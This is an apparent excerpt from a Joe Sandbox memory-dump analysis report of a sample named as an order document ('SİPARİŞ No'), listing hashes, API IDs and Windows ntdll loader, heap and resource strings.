                                                                  • Instruction ID: 277f645846a3657ed30328d7c51dac9eb215223e9b12d30b50d2c3d930a06035
                                                                  • Opcode Fuzzy Hash: df489128f1d1f0bccc48945532f910da425d5ebdae7f7a0666bc179e6274f51d
                                                                  • Instruction Fuzzy Hash: 09E1AC746087419FEB14CF28D890B1AB7E0BF86358F204A69F5A58F3E0DBB4D945CB52
                                                                   Memory Dump Source
                                                                   • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 3446177414-3610490719
                                                                  • Opcode ID: b6445da24fa2da7d47df375c65992b350892687bad2a8e7350aabd1af1dabfc1
                                                                  • Instruction ID: 0d2b11a4a0173812dc20aef9fd256fd5783ecd1dc28ff6127e200a3561281d40
                                                                  • Opcode Fuzzy Hash: b6445da24fa2da7d47df375c65992b350892687bad2a8e7350aabd1af1dabfc1
                                                                  • Instruction Fuzzy Hash: DE91CF75608741EFE719DB24C884B2EB7A5BF84B48F000959F9819F790DF74A845CBE2
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 32D9A117
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 32D9A10F
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D9A121
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-161242083
                                                                  • Opcode ID: 3372af14a89100e0fcb7ec22b383c9289a4deacf61b2870cf6179ee0dd605ea2
                                                                  • Instruction ID: 886e8a44b2eecb5a83bfbfe5b9d7ee04f2a12159fb4b3bdfe8a94823d98fa2c0
                                                                  • Opcode Fuzzy Hash: 3372af14a89100e0fcb7ec22b383c9289a4deacf61b2870cf6179ee0dd605ea2
                                                                  • Instruction Fuzzy Hash: 4C71DE75A003059FEB08DF68C981BAEB7F4EB48704F654469E906E7350EBB4A986CB50
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 32DA7B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32DA7B7F
                                                                  • RTL: Re-Waiting, xrefs: 32DA7BAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: 4624e4f051776be330c5b881686a234d82d11d1a6c8a40259528479926aa94be
                                                                  • Instruction ID: 2f55ef9e6f4a487af971a6716f1051193da7bf92f9be406629b50a04c516c114
                                                                  • Opcode Fuzzy Hash: 4624e4f051776be330c5b881686a234d82d11d1a6c8a40259528479926aa94be
                                                                  • Instruction Fuzzy Hash: C841E0757017028FE714CE28D850B6AB7E5EF88314F400A2DF99AEB790DB71E805CB91
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 32DA728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 32DA72A3
                                                                  • RTL: Re-Waiting, xrefs: 32DA72C1
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32DA7294
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: 1f407519a39d53cb933e71a8d6d9cf9a262b6c04f0a6ecfdf654c48bb1a17601
                                                                  • Instruction ID: 7dc3593aad3574f525fdd8f7ba3a1ad03ffd939f823056182184952a0e289e0f
                                                                  • Opcode Fuzzy Hash: 1f407519a39d53cb933e71a8d6d9cf9a262b6c04f0a6ecfdf654c48bb1a17601
                                                                  • Instruction Fuzzy Hash: B241EF35A00206ABE714CE24DC41F6AB7A5FF94758F508629F995EB740DB30F846CBE1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eabeb978bbed9d34105f330091cc56c1eae7ac1de55dc54491d7d77ea839033a
                                                                  • Instruction ID: a9b53e9b59ce2caec21b158d94888aee794cdf23eee82e7e0b379bd6544f1b3f
                                                                  • Opcode Fuzzy Hash: eabeb978bbed9d34105f330091cc56c1eae7ac1de55dc54491d7d77ea839033a
                                                                  • Instruction Fuzzy Hash: 52E1CEB5900708DFDF25CFA9C984A8DBBF1BF49354F24456AE985AB360DBB0A841CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
Similarity
• API ID: DebugPrintTimes$BaseInitThreadThunk
• String ID:
• API String ID: 4281723722-0
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
Similarity
• API ID:
• String ID: 0$Flst
• API String ID: 0-758220159
Similarity
• API ID: DebugPrintTimes
• String ID: 0$0
• API String ID: 3446177414-203156872